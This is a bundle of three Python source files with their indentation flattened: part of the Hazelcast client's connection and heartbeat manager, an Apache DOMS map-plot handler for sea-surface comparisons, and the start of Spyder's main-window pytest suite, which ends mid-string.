connection.close("Hazelcast client is shutting down", None)
self.active_connections.clear()
self._addresses_to_connections.clear()
self._pending_connections.clear()
del self._connection_listeners[:]
def connect_to_all_cluster_members(self):
if not self._smart_routing_enabled:
return
for member in self._cluster_service.get_members():
try:
self._get_or_connect(member.address).result()
except:
pass
def on_connection_close(self, closed_connection, cause):
connected_address = closed_connection.connected_address
remote_uuid = closed_connection.remote_uuid
remote_address = closed_connection.remote_address
if not connected_address:
_logger.debug(
"Destroying %s, but it has no remote address, hence nothing is "
"removed from the connection dictionary",
closed_connection,
)
with self._lock:
pending = self._pending_connections.pop(connected_address, None)
connection = self.active_connections.pop(remote_uuid, None)
self._addresses_to_connections.pop(remote_address, None)
if pending:
pending.set_exception(cause)
if connection:
_logger.info(
"Removed connection to %s:%s, connection: %s",
connected_address,
remote_uuid,
connection,
)
if not self.active_connections:
self._lifecycle_service.fire_lifecycle_event(LifecycleState.DISCONNECTED)
self._trigger_cluster_reconnection()
if connection:
for _, on_connection_closed in self._connection_listeners:
if on_connection_closed:
try:
on_connection_closed(connection, cause)
except:
_logger.exception("Exception in connection listener")
else:
if remote_uuid:
_logger.debug(
"Destroying %s, but there is no mapping for %s in the connection dictionary",
closed_connection,
remote_uuid,
)
def check_invocation_allowed(self):
if self.active_connections:
return
if self._async_start or self._reconnect_mode == ReconnectMode.ASYNC:
raise ClientOfflineError()
else:
raise IOError("No connection found to cluster")
def _trigger_cluster_reconnection(self):
if self._reconnect_mode == ReconnectMode.OFF:
_logger.info("Reconnect mode is OFF. Shutting down the client")
self._shutdown_client()
return
if self._lifecycle_service.running:
self._start_connect_to_cluster_thread()
def _init_wait_strategy(self, config):
cluster_connect_timeout = config.cluster_connect_timeout
if cluster_connect_timeout == -1:
# If no timeout is specified by the
# user, or it is set to -1 explicitly,
# treat the timeout as infinite.
cluster_connect_timeout = sys.maxsize
return _WaitStrategy(
config.retry_initial_backoff,
config.retry_max_backoff,
config.retry_multiplier,
cluster_connect_timeout,
config.retry_jitter,
)
def _start_connect_all_members_timer(self):
connecting_addresses = set()
def run():
if not self._lifecycle_service.running:
return
for member in self._cluster_service.get_members():
address = member.address
if (
not self.get_connection_from_address(address)
and address not in connecting_addresses
):
connecting_addresses.add(address)
if not self._lifecycle_service.running:
break
if not self.get_connection(member.uuid):
# Bind the address to the value
# in this loop iteration
def cb(_, address=address):
connecting_addresses.discard(address)
self._get_or_connect(address).add_done_callback(cb)
self._connect_all_members_timer = self._reactor.add_timer(1, run)
self._connect_all_members_timer = self._reactor.add_timer(1, run)
def _connect_to_cluster(self):
if self._async_start:
self._start_connect_to_cluster_thread()
else:
self._sync_connect_to_cluster()
def _start_connect_to_cluster_thread(self):
with self._lock:
if self._connect_to_cluster_thread_running:
return
self._connect_to_cluster_thread_running = True
def run():
try:
while True:
self._sync_connect_to_cluster()
with self._lock:
if self.active_connections:
self._connect_to_cluster_thread_running = False
return
except:
_logger.exception("Could not connect to any cluster, shutting down the client")
self._shutdown_client()
t = threading.Thread(target=run, name="hazelcast_async_connection")
t.daemon = True
t.start()
def _shutdown_client(self):
try:
self._client.shutdown()
except:
_logger.exception("Exception during client shutdown")
def _sync_connect_to_cluster(self):
tried_addresses = set()
self._wait_strategy.reset()
try:
while True:
for address in self._get_possible_addresses():
self._check_client_active()
tried_addresses.add(address)
connection = self._connect(address)
if connection:
return
# If the address providers load no addresses (which seems to be possible),
# then the above loop is not entered and the lifecycle check is missing,
# hence we need to repeat the same check at this point.
self._check_client_active()
if not self._wait_strategy.sleep():
break
except (ClientNotAllowedInClusterError, InvalidConfigurationError):
cluster_name = self._config.cluster_name
_logger.exception("Stopped trying on cluster %s", cluster_name)
cluster_name = self._config.cluster_name
_logger.info(
"Unable to connect to any address from the cluster with name: %s. "
"The following addresses were tried: %s",
cluster_name,
tried_addresses,
)
if self._lifecycle_service.running:
msg = "Unable to connect to any cluster"
else:
msg = "Client is being shutdown"
raise IllegalStateError(msg)
def _connect(self, address):
_logger.info("Trying to connect to %s", address)
try:
return self._get_or_connect(address).result()
except (ClientNotAllowedInClusterError, InvalidConfigurationError) as e:
_logger.warning("Error during initial connection to %s: %s", address, e)
raise e
except Exception as e:
_logger.warning("Error during initial connection to %s: %s", address, e)
return None
def _get_or_connect(self, address):
connection = self.get_connection_from_address(address)
if connection:
return ImmediateFuture(connection)
with self._lock:
connection = self.get_connection_from_address(address)
if connection:
return ImmediateFuture(connection)
else:
pending = self._pending_connections.get(address, None)
if pending:
return pending
else:
try:
translated = self._address_provider.translate(address)
if not translated:
error = ValueError(
"Address translator could not translate address %s" % address
)
return ImmediateExceptionFuture(error)
factory = self._reactor.connection_factory
connection = factory(
self,
self._connection_id_generator.get_and_increment(),
translated,
self._config,
self._invocation_service.handle_client_message,
)
except IOError:
error = sys.exc_info()
return ImmediateExceptionFuture(error[1], error[2])
future = self._authenticate(connection).continue_with(
self._on_auth, connection, address
)
self._pending_connections[address] = future
return future
def _authenticate(self, connection):
client = self._client
cluster_name = self._config.cluster_name
client_name = client.name
request = client_authentication_codec.encode_request(
cluster_name,
None,
None,
self.client_uuid,
CLIENT_TYPE,
SERIALIZATION_VERSION,
__version__,
client_name,
self._labels,
)
invocation = Invocation(
request, connection=connection, urgent=True, response_handler=lambda m: m
)
self._invocation_service.invoke(invocation)
return invocation.future
def _on_auth(self, response, connection, address):
if response.is_success():
response = client_authentication_codec.decode_response(response.result())
status = response["status"]
if status == _AuthenticationStatus.AUTHENTICATED:
return self._handle_successful_auth(response, connection, address)
if status == _AuthenticationStatus.CREDENTIALS_FAILED:
err = AuthenticationError(
"Authentication failed. The configured cluster name on "
"the client does not match the one configured in the cluster."
)
elif status == _AuthenticationStatus.NOT_ALLOWED_IN_CLUSTER:
err = ClientNotAllowedInClusterError("Client is not allowed in the cluster")
elif status == _AuthenticationStatus.SERIALIZATION_VERSION_MISMATCH:
err = IllegalStateError("Server serialization version does not match to client")
else:
err = AuthenticationError(
"Authentication status code not supported. status: %s" % status
)
connection.close("Failed to authenticate connection", err)
raise err
else:
e = response.exception()
# This will set the exception for the pending connection future
connection.close("Failed to authenticate connection", e)
six.reraise(e.__class__, e, response.traceback())
def _handle_successful_auth(self, response, connection, address):
self._check_partition_count(response["partition_count"])
server_version_str = response["server_hazelcast_version"]
remote_address = response["address"]
remote_uuid = response["member_uuid"]
connection.remote_address = remote_address
connection.server_version = calculate_version(server_version_str)
connection.remote_uuid = remote_uuid
new_cluster_id = response["cluster_id"]
is_initial_connection = not self.active_connections
changed_cluster = (
is_initial_connection
and self._cluster_id is not None
and self._cluster_id != new_cluster_id
)
if changed_cluster:
_logger.warning(
"Switching from current cluster: %s to new cluster: %s",
self._cluster_id,
new_cluster_id,
)
self._on_cluster_restart()
with self._lock:
self.active_connections[remote_uuid] = connection
self._addresses_to_connections[remote_address] = connection
self._pending_connections.pop(address, None)
if is_initial_connection:
self._cluster_id = new_cluster_id
self._lifecycle_service.fire_lifecycle_event(LifecycleState.CONNECTED)
_logger.info(
"Authenticated with server %s:%s, server version: %s, local address: %s",
remote_address,
remote_uuid,
server_version_str,
connection.local_address,
)
for on_connection_opened, _ in self._connection_listeners:
if on_connection_opened:
try:
on_connection_opened(connection)
except:
_logger.exception("Exception in connection listener")
if not connection.live:
self.on_connection_close(connection, None)
return connection
def _on_cluster_restart(self):
self._near_cache_manager.clear_near_caches()
self._cluster_service.clear_member_list_version()
def _check_partition_count(self, partition_count):
if not self._partition_service.check_and_set_partition_count(partition_count):
raise ClientNotAllowedInClusterError(
"Client can not work with this cluster because it has a "
"different partition count. Expected partition count: %d, "
"Member partition count: %d"
% (self._partition_service.partition_count, partition_count)
)
def _check_client_active(self):
if not self._lifecycle_service.running:
raise HazelcastClientNotActiveError()
def _get_possible_addresses(self):
member_addresses = list(
map(lambda m: (m.address, None), self._cluster_service.get_members())
)
if self._shuffle_member_list:
random.shuffle(member_addresses)
addresses = OrderedDict(member_addresses)
primaries, secondaries = self._address_provider.load_addresses()
if self._shuffle_member_list:
random.shuffle(primaries)
random.shuffle(secondaries)
for address in primaries:
addresses[address] = None
for address in secondaries:
addresses[address] = None
return six.iterkeys(addresses)
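# --- Illustrative sketch (not part of the Hazelcast client) ---
# _get_possible_addresses above relies on OrderedDict keys to de-duplicate
# member, primary and secondary addresses while preserving insertion order;
# the same idea in isolation:
def _dedupe_preserving_order(*address_groups):
    merged = OrderedDict()
    for group in address_groups:
        for address in group:
            merged[address] = None
    return list(merged.keys())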
class _HeartbeatManager(object):
_heartbeat_timer = None
def __init__(self, connection_manager, client, config, reactor, invocation_service):
self._connection_manager = connection_manager
self._client = client
self._reactor = reactor
self._invocation_service = invocation_service
self._heartbeat_timeout = config.heartbeat_timeout
self._heartbeat_interval = config.heartbeat_interval
def start(self):
"""Starts sending periodic HeartBeat operations."""
def _heartbeat():
conn_manager = self._connection_manager
if not conn_manager.live:
return
now = time.time()
for connection in list(six.itervalues(conn_manager.active_connections)):
self._check_connection(now, connection)
self._heartbeat_timer = self._reactor.add_timer(self._heartbeat_interval, _heartbeat)
self._heartbeat_timer = self._reactor.add_timer(self._heartbeat_interval, _heartbeat)
def shutdown(self):
"""Stops HeartBeat operations."""
if self._heartbeat_timer:
self._heartbeat_timer.cancel()
def _check_connection(self, now, connection):
if not connection.live:
return
if (now - connection.last_read_time) > self._heartbeat_timeout:
_logger.warning("Heartbeat failed over the connection: %s", connection)
connection.close(
"Heartbeat timed out",
TargetDisconnectedError("Heartbeat timed out to connection %s" % connection),
)
return
if (now - connection.last_write_time) > self._heartbeat_interval:
request = client_ping_codec.encode_request()
invocation = Invocation(request, connection=connection, urgent=True)
self._invocation_service.invoke(invocation)
_frame_header = struct.Struct("<iH")
class _Reader(object):
def __init__(self, builder):
self._buf = io.BytesIO()
self._builder = builder
self._bytes_read = 0
self._bytes_written = 0
self._frame_size = 0
self._frame_flags = 0
self._message = None
def read(self, data):
self._buf.seek(self._bytes_written)
self._buf.write(data)
self._bytes_written += len(data)
def process(self):
message = self._read_message()
while message:
self._builder.on_message(message)
message = self._read_message()
def _read_message(self):
while True:
if self._read_frame():
if self._message.end_frame.is_final_frame():
msg = self._message
self._reset()
return msg
else:
return None
def _read_frame(self):
n = self.length
if n < SIZE_OF_FRAME_LENGTH_AND_FLAGS:
# we don't have even the frame length and flags ready
return False
if self._frame_size == 0:
self._read_frame_size_and_flags()
if n < self._frame_size:
return False
self._buf.seek(self._bytes_read)
size = self._frame_size - SIZE_OF_FRAME_LENGTH_AND_FLAGS
data = self._buf.read(size)
self._bytes_read += size
self._frame_size = 0
# No need to reset flags since it will be overwritten on the next read_frame_size_and_flags call
frame = Frame(data, self._frame_flags)
if not self._message:
self._message = InboundMessage(frame)
else:
self._message.add_frame(frame)
return True
def _read_frame_size_and_flags(self):
self._buf.seek(self._bytes_read)
header_data = self._buf.read(SIZE_OF_FRAME_LENGTH_AND_FLAGS)
self._frame_size, self._frame_flags = _frame_header.unpack_from(header_data, 0)
self._bytes_read += SIZE_OF_FRAME_LENGTH_AND_FLAGS
def _reset(self):
if self._bytes_written == self._bytes_read:
self._buf.seek(0)
self._buf.truncate()
self._bytes_written = 0
self._bytes_read = 0
self._message = None
@property
def length(self):
return self._bytes_written - self._bytes_read
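# --- Illustrative sketch (not part of the Hazelcast client) ---
# Each frame starts with a little-endian int32 length and uint16 flags
# (see _frame_header below). Packing a dummy frame shows the layout the
# _Reader expects; the payload bytes are arbitrary.
def _example_frame(payload=b"hello"):
    length = SIZE_OF_FRAME_LENGTH_AND_FLAGS + len(payload)
    flags = 0
    return _frame_header.pack(length, flags) + payload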
class Connection(object):
"""Connection object which stores connection related information and operations."""
def __init__(self, connection_manager, connection_id, message_callback):
self.remote_address = None
self.remote_uuid = None
self.connected_address = None
self.local_address = None
self.last_read_time = 0
self.last_write_time = 0
self.start_time = 0
self.server_version = UNKNOWN_VERSION
self.live = True
self.close_reason = None
self._connection_manager = connection_manager
self._id = connection_id
self._builder = ClientMessageBuilder(message_callback)
self._reader = _Reader(self._builder)
def send_message(self, message):
"""Sends a message to this connection.
Args:
message (hazelcast.protocol.client_message.OutboundMessage): Message to be sent to this connection.
Returns:
bool: ``True`` if the message is written to the socket, ``False`` otherwise.
"""
if not self.live:
return False
self._write(message.buf)
return True
def close(self, reason, cause):
"""Closes the connection.
Args:
reason (str): The reason this connection is going to be closed. Is allowed to be None.
cause (Exception): The exception responsible for closing this connection. Is allowed to be None.
"""
if not self.live:
return
self.live = False
self.close_reason = reason
self._log_close(reason, cause)
try:
self._inner_close()
except:
_logger.exception("Error while closing the the connection %s", self)
self._connection_manager.on_connection_close(self, cause)
def _log_close(self, reason, cause):
msg = "%s closed. Reason: %s"
if reason:
r = reason
elif cause:
r = cause
else:
r = "Socket explicitly closed"
if self._connection_manager.live:
_logger.info(msg, self, r)
else:
_logger.debug(msg, self, r)
def _inner_close(self):
raise NotImplementedError()
def _write(self, buf):
raise NotImplementedError()
def __eq__(self, other):
return isinstance(other, Connection) and self._id == other._id
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return self._id
class DefaultAddressProvider(object):
"""Provides initial addresses for client to find and connect to a node.
It also provides a no-op translator.
"""
def __init__(self, addresses):
self._addresses = addresses
def load_addresses(self):
"""Returns the possible primary and secondary member addresses to connect to."""
configured_addresses = self._addresses
if not configured_addresses:
configured_addresses = ["127.0.0.1"]
primaries = []
secondaries = []
for address in configured_addresses:
p, s = AddressHelper.get_possible_addresses(address)
primaries.extend(p)
secondaries.extend(s)
return primaries, secondaries
def translate(self, address):
"""No-op address translator.
It is there to provide the same API with other address providers.
"""
return address
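# --- Illustrative usage sketch (not part of the Hazelcast client) ---
# DefaultAddressProvider expands each configured address into primary and
# secondary candidates (well-known ports); with no addresses it falls back
# to localhost.
if __name__ == "__main__":
    _provider = DefaultAddressProvider([])
    _primaries, _secondaries = _provider.load_addresses()
    print("primaries:", _primaries)
    print("secondaries:", _secondaries)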
|
mapplot.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
from io import BytesIO
from multiprocessing import Process, Manager
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.basemap import Basemap
from . import BaseDomsHandler
from . import ResultsStorage
if not matplotlib.get_backend():
matplotlib.use('Agg')
PARAMETER_TO_FIELD = {
"sst": "sea_water_temperature",
"sss": "sea_water_salinity"
}
PARAMETER_TO_UNITS = {
"sst": "($^\circ$ C)",
"sss": "(g/L)"
}
def __square(minLon, maxLon, minLat, maxLat):
if maxLat - minLat > maxLon - minLon:
a = ((maxLat - minLat) - (maxLon - minLon)) / 2.0
minLon -= a
maxLon += a
elif maxLon - minLon > maxLat - minLat:
a = ((maxLon - minLon) - (maxLat - minLat)) / 2.0
minLat -= a
maxLat += a
return minLon, maxLon, minLat, maxLat
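# --- Illustrative note (not part of the original handler) ---
# __square pads the shorter side of a lat/lon bounding box so the plot area
# is square; e.g. a 10-degree-wide, 4-degree-tall box gains 3 degrees of
# latitude on each side:
#   __square(-5.0, 5.0, -2.0, 2.0)  ->  (-5.0, 5.0, -5.0, 5.0)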
def render(d, lats, lons, z, primary, secondary, parameter):
fig = plt.figure()
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.set_title(("%s vs. %s" % (primary, secondary)).upper())
# ax.set_ylabel('Latitude')
# ax.set_xlabel('Longitude')
minLatA = np.min(lats)
maxLatA = np.max(lats)
minLonA = np.min(lons)
maxLonA = np.max(lons)
minLat = minLatA - (abs(maxLatA - minLatA) * 0.1)
maxLat = maxLatA + (abs(maxLatA - minLatA) * 0.1)
minLon = minLonA - (abs(maxLonA - minLonA) * 0.1)
maxLon = maxLonA + (abs(maxLonA - minLonA) * 0.1)
minLon, maxLon, minLat, maxLat = __square(minLon, maxLon, minLat, maxLat)
# m = Basemap(projection='mill', llcrnrlon=-180,llcrnrlat=-80,urcrnrlon=180,urcrnrlat=80,resolution='l')
m = Basemap(projection='mill', llcrnrlon=minLon, llcrnrlat=minLat, urcrnrlon=maxLon, urcrnrlat=maxLat,
resolution='l')
m.drawparallels(np.arange(minLat, maxLat, (maxLat - minLat) / 5.0), labels=[1, 0, 0, 0], fontsize=10)
m.drawmeridians(np.arange(minLon, maxLon, (maxLon - minLon) / 5.0), labels=[0, 0, 0, 1], fontsize=10)
m.drawcoastlines()
m.drawmapboundary(fill_color='#99ffff')
m.fillcontinents(color='#cc9966', lake_color='#99ffff')
# lats, lons = np.meshgrid(lats, lons)
masked_array = np.ma.array(z, mask=np.isnan(z))
z = masked_array
values = np.zeros(len(z))
for i in range(0, len(z)):
values[i] = ((z[i] - np.min(z)) / (np.max(z) - np.min(z)) * 20.0) + 10
x, y = m(lons, lats)
im1 = m.scatter(x, y, values)
im1.set_array(z)
cb = m.colorbar(im1)
units = PARAMETER_TO_UNITS[parameter] if parameter in PARAMETER_TO_UNITS else PARAMETER_TO_UNITS["sst"]
cb.set_label("Difference %s" % units)
sio = BytesIO()
plt.savefig(sio, format='png')
plot = sio.getvalue()
if d is not None:
d['plot'] = plot
return plot
class DomsMapPlotQueryResults(BaseDomsHandler.DomsQueryResults):
def __init__(self, lats, lons, z, parameter, primary, secondary, args=None, bounds=None, count=None, details=None,
computeOptions=None, executionId=None, plot=None):
BaseDomsHandler.DomsQueryResults.__init__(self, results={"lats": lats, "lons": lons, "values": z}, args=args,
details=details, bounds=bounds, count=count,
computeOptions=computeOptions, executionId=executionId)
self.__lats = lats
self.__lons = lons
self.__z = np.array(z)
self.__parameter = parameter
self.__primary = primary
self.__secondary = secondary
self.__plot = plot
def toImage(self):
return self.__plot
def renderAsync(x, y, z, primary, secondary, parameter):
manager = Manager()
d = manager.dict()
p = Process(target=render, args=(d, x, y, z, primary, secondary, parameter))
p.start()
p.join()
return d['plot']
def createMapPlot(id, parameter):
with ResultsStorage.ResultsRetrieval() as storage:
params, stats, data = storage.retrieveResults(id)
primary = params["primary"]
secondary = params["matchup"][0]
lats = []
lons = []
z = []
field = PARAMETER_TO_FIELD[parameter] if parameter in PARAMETER_TO_FIELD else PARAMETER_TO_FIELD["sst"]
for entry in data:
for match in entry["matches"]:
if match["source"] == secondary:
if field in entry and field in match:
a = entry[field]
b = match[field]
z.append((a - b))
z.append((a - b))
else:
z.append(1.0)
z.append(1.0)
lats.append(entry["y"])
lons.append(entry["x"])
lats.append(match["y"])
lons.append(match["x"])
plot = renderAsync(lats, lons, z, primary, secondary, parameter)
r = DomsMapPlotQueryResults(lats=lats, lons=lons, z=z, parameter=parameter, primary=primary, secondary=secondary,
args=params,
details=stats, bounds=None, count=None, computeOptions=None, executionId=id, plot=plot)
return r
|
test_mainwindow.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
import os
import os.path as osp
import re
import shutil
import sys
import tempfile
from textwrap import dedent
from unittest.mock import Mock
import uuid
# Third party imports
from flaky import flaky
import ipykernel
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pkg_resources
from pkg_resources import parse_version
import pylint
import pytest
from qtpy import PYQT_VERSION
from qtpy.QtCore import Qt, QTimer
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage, QTextCursor
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__
from spyder.api.utils import get_class_values
from spyder.api.widgets.auxiliary_widgets import SpyderWindowWidget
from spyder.api.plugins import Plugins
from spyder.app import start
from spyder.config.base import (
get_home_dir, get_conf_path, get_module_path, running_in_ci)
from spyder.config.manager import CONF
from spyder.dependencies import DEPENDENCIES
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.layout.layouts import DefaultLayouts
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, qbytearray_to_str, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import remove_backslashes
from spyder.utils.clipboard_helper import CLIPBOARD_HELPER
from spyder.widgets.dock import DockTitleBar
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# A longer timeout is needed because the ".pyx" file has to be cythonized and
# C-compiled before it can be imported and evaluated
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
"""Open a file using the Editor and its open file dialog"""
top_level_widgets = QApplication.topLevelWidgets()
for w in top_level_widgets:
if isinstance(w, QFileDialog):
if directory is not None:
w.setDirectory(directory)
input_field = w.findChildren(QLineEdit)[0]
input_field.setText(fname)
QTest.keyClick(w, Qt.Key_Enter)
def reset_run_code(qtbot, shell, code_editor, nsb):
"""Reset state after a run code test"""
qtbot.waitUntil(lambda: not shell._executing)
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
**kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
if spykernel:
km._kernel_spec = SpyderKernelSpec()
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
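# --- Illustrative usage note (not part of the Spyder test suite) ---
# start_new_kernel returns a (KernelManager, KernelClient) pair; a caller is
# expected to shut both down when done, roughly like this:
#
#   km, kc = start_new_kernel()
#   try:
#       ...  # run code against kc
#   finally:
#       kc.stop_channels()
#       km.shutdown_kernel(now=True)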
def find_desired_tab_in_window(tab_name, window):
all_tabbars = window.findChildren(QTabBar)
for current_tabbar in all_tabbars:
for tab_index in range(current_tabbar.count()):
if current_tabbar.tabText(tab_index) == str(tab_name):
return current_tabbar, tab_index
return None, None
def register_fake_entrypoints():
"""
Create entry points distribution to register elements:
* Completion providers (Fallback, Snippets, LSP)
"""
# Completion providers
fallback = pkg_resources.EntryPoint.parse(
'fallback = spyder.plugins.completion.providers.fallback.provider:'
'FallbackProvider'
)
snippets = pkg_resources.EntryPoint.parse(
'snippets = spyder.plugins.completion.providers.snippets.provider:'
'SnippetsProvider'
)
lsp = pkg_resources.EntryPoint.parse(
'lsp = spyder.plugins.completion.providers.languageserver.provider:'
'LanguageServerProvider'
)
# Create a fake Spyder distribution
d = pkg_resources.Distribution(__file__)
# Add the providers to the fake EntryPoints
d._ep_map = {
'spyder.completions': {
'fallback': fallback,
'snippets': snippets,
'lsp': lsp
}
}
# Add the fake distribution to the global working_set
pkg_resources.working_set.add(d, 'spyder')
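# --- Illustrative note (not part of the Spyder test suite) ---
# Once the fake distribution is added to pkg_resources.working_set, the
# providers become discoverable the same way real ones are, roughly:
#
#   register_fake_entrypoints()
#   names = [ep.name for ep in pkg_resources.iter_entry_points('spyder.completions')]
#   # expected to include 'fallback', 'snippets' and 'lsp'
#   remove_fake_entrypoints()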
def remove_fake_entrypoints():
"""Remove fake entry points from pkg_resources"""
try:
pkg_resources.working_set.by_key.pop('unknown')
pkg_resources.working_set.entry_keys.pop('spyder')
pkg_resources.working_set.entry_keys.pop(__file__)
pkg_resources.working_set.entries.remove('spyder')
except KeyError:
pass
def read_asset_file(filename):
"""Read contents of an asset file."""
return encoding.read(osp.join(LOCATION, filename))[0]
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir):
"""Main Window fixture"""
if not running_in_ci():
register_fake_entrypoints()
# Tests assume inline backend
CONF.set('ipython_console', 'pylab/backend', 0)
# Test assume the plots are rendered in the console as png
CONF.set('plots', 'mute_inline_plotting', False)
CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
# Set exclamation mark to True
CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)
# Check if we need to use introspection in a given test
# (it's faster and less memory consuming not to use it!)
use_introspection = request.node.get_closest_marker('use_introspection')
if use_introspection:
os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
else:
try:
os.environ.pop('SPY_TEST_USE_INTROSPECTION')
except KeyError:
pass
# Only use single_instance mode for tests that require it
single_instance = request.node.get_closest_marker('single_instance')
if single_instance:
CONF.set('main', 'single_instance', True)
else:
CONF.set('main', 'single_instance', False)
# Check if we need to load a simple project to the interface
preload_project = request.node.get_closest_marker('preload_project')
if preload_project:
# Create project directory
project = tmpdir.mkdir('test_project')
project_path = str(project)
# Create Spyder project
spy_project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add a file to the project
file = project.join('file.py')
file.write(read_asset_file('script_outline_1.py'))
spy_project.set_recent_files([str(file)])
else:
CONF.set('project_explorer', 'current_project_path', None)
# Check if we need to preload a complex project in a given test
preload_complex_project = request.node.get_closest_marker(
'preload_complex_project')
if preload_complex_project:
# Create project
project = tmpdir.mkdir('test_project')
project_subdir = project.mkdir('subdir')
project_sub_subdir = project_subdir.mkdir('sub_subdir')
# Create directories out of the project
out_of_project_1 = tmpdir.mkdir('out_of_project_1')
out_of_project_2 = tmpdir.mkdir('out_of_project_2')
out_of_project_1_subdir = out_of_project_1.mkdir('subdir')
out_of_project_2_subdir = out_of_project_2.mkdir('subdir')
project_path = str(project)
spy_project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add some files to project. This is necessary to test that we get
# symbols for all these files.
abs_filenames = []
filenames_to_create = {
project: ['file1.py', 'file2.py', 'file3.txt', '__init__.py'],
project_subdir: ['a.py', '__init__.py'],
project_sub_subdir: ['b.py', '__init__.py'],
out_of_project_1: ['c.py'],
out_of_project_2: ['d.py', '__init__.py'],
out_of_project_1_subdir: ['e.py', '__init__.py'],
out_of_project_2_subdir: ['f.py']
}
for path in filenames_to_create.keys():
filenames = filenames_to_create[path]
for filename in filenames:
file = path.join(filename)
abs_filenames.append(str(file))
if osp.splitext(filename)[1] == '.py':
if path == project_subdir:
code = read_asset_file('script_outline_2.py')
elif path == project_sub_subdir:
code = read_asset_file('script_outline_3.py')
else:
code = read_asset_file('script_outline_1.py')
file.write(code)
else:
file.write("Hello world!")
spy_project.set_recent_files(abs_filenames)
else:
if not preload_project:
CONF.set('project_explorer', 'current_project_path', None)
# Get config values passed in parametrize and apply them
try:
param = request.param
if isinstance(param, dict) and 'spy_config' in param:
CONF.set(*param['spy_config'])
except AttributeError:
pass
if not hasattr(main_window, 'window'):
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
PLUGIN_REGISTRY.reset()
# Start the window
window = start.main()
main_window.window = window
else:
window = main_window.window
# Close everything we can think of
window.editor.close_file()
window.projects.close_project()
if window.console.error_dialog:
window.console.close_error_dialog()
window.switcher.close()
for client in window.ipyconsole.get_clients():
window.ipyconsole.close_client(client=client, ask_recursive=False)
window.outlineexplorer.stop_symbol_services('python')
# Reset cwd
window.explorer.chdir(get_home_dir())
spyder_boilerplate = window.get_plugin(
'spyder_boilerplate', error=False)
if spyder_boilerplate is not None:
window.unregister_plugin(spyder_boilerplate)
# Remove Kite (In case it was registered via setup.py)
window.completions.providers.pop('kite', None)
yield window
# Print shell content if failed
if request.node.rep_setup.passed:
if request.node.rep_call.failed:
# Print content of shellwidget and close window
print(window.ipyconsole.get_current_shellwidget(
)._control.toPlainText())
# Print the info page content if it is not blank
console = window.ipyconsole
client = console.get_current_client()
if client.info_page != client.blank_page:
print('info_page')
print(client.info_page)
window.close()
del main_window.window
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
"""Cleanup a testing directory once we are finished."""
def close_window():
if hasattr(main_window, 'window'):
try:
main_window.window.close()
except AttributeError:
pass
# Also clean entry points if running locally.
if not running_in_ci():
remove_fake_entrypoints()
request.addfinalizer(close_window)
# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.single_instance
@pytest.mark.skipif(
not running_in_ci(), reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
"""Test single instance mode and %edit magic."""
editorstack = main_window.editor.get_current_editorstack()
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
spy_dir = osp.dirname(get_module_path('spyder'))
lock_code = (
"import sys\n"
"sys.path.append(r'{spy_dir_str}')\n"
"from spyder.utils.external import lockfile\n"
"lock_file = r'{lock_file}'\n"
"lock = lockfile.FilesystemLock(lock_file)\n"
"lock_created = lock.lock()\n"
"print(lock_created)".format(
spy_dir_str=spy_dir,
